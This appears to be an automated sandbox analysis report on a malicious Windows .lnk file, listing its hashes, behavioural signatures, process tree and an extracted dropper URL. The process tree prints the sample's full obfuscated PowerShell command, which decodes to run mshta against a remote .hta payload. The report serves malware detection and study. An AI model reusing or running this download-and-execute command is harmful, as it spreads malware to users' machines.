Analysis
-
max time kernel
44s -
max time network
48s -
platform
windows7_x64 -
resource
win7-20220414-en -
submitted
24-05-2022 12:24
Static task
static1
Behavioral task
behavioral1
Sample
54267-876-8676.lnk
Resource
win7-20220414-en
windows7_x64
0 signatures
0 seconds
General
-
Target
54267-876-8676.lnk
-
Size
2KB
-
MD5
9edabe11d846a6de5d337e737d24e85c
-
SHA1
26f63aac40c4e9f459a379eec94a258b604f582e
-
SHA256
4b582f38e3376346cb066e36ff8dfa32b268154bb2de13870702e8bbf366a023
-
SHA512
5e88d418cb26f4bfd7bf5d1b2dbf31a8f026bbf29c760919d2986c883de6067df75c5eb8ca790a2c4a7ef09b87a2c6ba1b62e57e76fc3b32af633317639c6f0e
Score
10/10
Malware Config
Extracted
Language
hta
Source
URLs
hta.dropper
https://modhub.com.br/upload.hta
Signatures
-
Blocklisted process makes network request 4 IoCs
Processes:
mshta.exeflow pid process 4 428 mshta.exe 5 428 mshta.exe 6 428 mshta.exe 7 428 mshta.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Processes:
mshta.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000\Software\Microsoft\Internet Explorer\Main mshta.exe -
Suspicious behavior: EnumeratesProcesses 1 IoCs
Processes:
powershell.exepid process 1832 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 1832 powershell.exe -
Suspicious use of WriteProcessMemory 6 IoCs
Processes:
cmd.exepowershell.exedescription pid process target process PID 536 wrote to memory of 1832 536 cmd.exe powershell.exe PID 536 wrote to memory of 1832 536 cmd.exe powershell.exe PID 536 wrote to memory of 1832 536 cmd.exe powershell.exe PID 1832 wrote to memory of 428 1832 powershell.exe mshta.exe PID 1832 wrote to memory of 428 1832 powershell.exe mshta.exe PID 1832 wrote to memory of 428 1832 powershell.exe mshta.exe
Processes
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\54267-876-8676.lnk1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" <#~@+uvOSgQ:Z#>$tEIiiZsclbDp=@(96580,96586,96575,96587,96568,96503,96575,96587,96587,96583,96586,96529,96518,96518,96580,96582,96571,96575,96588,96569,96517,96570,96582,96580,96517,96569,96585,96518,96588,96583,96579,96582,96568,96571,96517,96575,96587,96568);<#~@+uvOSgQ:Z#>$IMvbvbxLdUneQIhgXc=@(96544,96540,96559);<#~@+uvOSgQ:Z#>function xqvxwsJeK($LmLHgHafCwGhrN){$iSqvUTYMYOTHbW=96471;<#~@+uvOSgQ:Z#>$izdBrBghcDulg=$Null;foreach($eEFlcMD in $LmLHgHafCwGhrN){$izdBrBghcDulg+=[char]($eEFlcMD-$iSqvUTYMYOTHbW)};return $izdBrBghcDulg};sal UJNjnKJgNJogU (xqvxwsJeK $IMvbvbxLdUneQIhgXc);<#~@+uvOSgQ:Z#>UJNjnKJgNJogU((xqvxwsJeK $tEIiiZsclbDp));2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\mshta.exe"C:\Windows\system32\mshta.exe" https://modhub.com.br/upload.hta3⤵
- Blocklisted process makes network request
- Modifies Internet Explorer settings
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
memory/428-97-0x0000000000000000-mapping.dmp
-
memory/536-54-0x000007FEFB721000-0x000007FEFB723000-memory.dmpFilesize
8KB
-
memory/1832-88-0x0000000000000000-mapping.dmp
-
memory/1832-93-0x000007FEF33D0000-0x000007FEF3DF3000-memory.dmpFilesize
10.1MB
-
memory/1832-94-0x0000000002054000-0x0000000002057000-memory.dmpFilesize
12KB
-
memory/1832-95-0x000007FEF2870000-0x000007FEF33CD000-memory.dmpFilesize
11.4MB
-
memory/1832-96-0x000000001B780000-0x000000001BA7F000-memory.dmpFilesize
3.0MB
-
memory/1832-98-0x000000000205B000-0x000000000207A000-memory.dmpFilesize
124KB